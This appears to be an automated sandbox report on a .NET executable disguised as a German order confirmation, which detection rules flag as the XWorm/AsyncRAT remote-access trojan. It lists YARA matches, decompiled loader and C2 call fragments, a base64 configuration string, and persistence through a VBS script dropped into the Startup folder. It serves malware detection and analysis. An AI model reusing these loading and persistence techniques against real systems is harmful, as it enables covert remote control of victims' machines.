Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2298788165.00000000058B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWvpfkhurpqj.dll" vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308780855.0000000006560000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe, vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000000.2137828451.0000000000642000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDAVID.exe, vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2287041471.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Bestellbest#U00e4tigung.exe
Source: Bestellbest#U00e4tigung.exe	Binary or memory string: OriginalFilenameDAVID.exe, vs Bestellbest#U00e4tigung.exe

Source: Bestellbest#U00e4tigung.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Bestellbest#U00e4tigung.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Bestellbest#U00e4tigung.exe, Vizbykkfv.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bestellbest#U00e4tigung.exe.3b6fd10.5.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Bestellbest#U00e4tigung.exe.3b6fd10.5.raw.unpack, Vizbykkfv.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Settings.cs

Base64 encoded string: 'ZdLFu9RhGUbsO18wqknsSEb1hM1D9Eta4/RKWa/oV1SPelrzX3FZbSQJl29K9/ZGcMco1ryd0sgN8JH3OuM7CQ=='

Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Mutant created: \Sessions\1\BaseNamedObjects\pQMh0JV136n0w49S
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:64:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\44f96338-f44b-4583-aa05-1e24310248cf

Jump to behavior

Source: Bestellbest#U00e4tigung.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Bestellbest#U00e4tigung.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bestellbest#U00e4tigung.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File read: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process created: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 928
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process created: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Bestellbest#U00e4tigung.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Bestellbest#U00e4tigung.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308780855.0000000006560000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP<o,C:\Windows\System.pdb<@ source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbw source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308780855.0000000006560000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb,p# source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000C13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Bestellbest#U00e4tigung.PDB^ source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377563221.0000000000C13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Bestellbest#U00e4tigung.PDB source: Bestellbest#U00e4tigung.exe, 00000003.00000002.3377311204.0000000000957000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Bestellbest#U00e4tigung.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: Bestellbest#U00e4tigung.exe, Bcynvbydz.cs	.Net Code: Opqzv System.AppDomain.Load(byte[])
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Bestellbest#U00e4tigung.exe.3b6fd10.5.raw.unpack, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bestellbest#U00e4tigung.exe.3b6fd10.5.raw.unpack, Bcynvbydz.cs	.Net Code: Opqzv System.AppDomain.Load(byte[])
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	.Net Code: Memory

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.5c00000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.5c00000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2300569085.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732, type: MEMORYSTR

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_00CD146D pushfd ; ret	0_2_00CD1461
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F5C982 pushfd ; iretd	0_2_05F5C985
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_05F54AC8 pushfd ; ret	0_2_05F54AC9
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06603CE3 pushad ; retf	0_2_06603CE9
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_06604368 pushfd ; iretd	0_2_06604369
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Code function: 0_2_0660D3D2 push es; retf	0_2_0660D3DC

Source: 0.2.Bestellbest#U00e4tigung.exe.58b0000.6.raw.unpack, A0tcPCDo8SslpKNBxpa.cs

High entropy of concatenated method names: 'wOIDH2p6Ky', 'D3yDLB0N1L', 'jYED6NFosx', 'MCgDbQuSMU', 'sStDeOgtPI', 'lD5Du7tmse', 'I5kDUCgg0v', 'XvgDASW97n', 'jKbDZoNQk7', 'AQIDVrXooe'

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File created: C:\Users\user\AppData\Roaming\Current.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
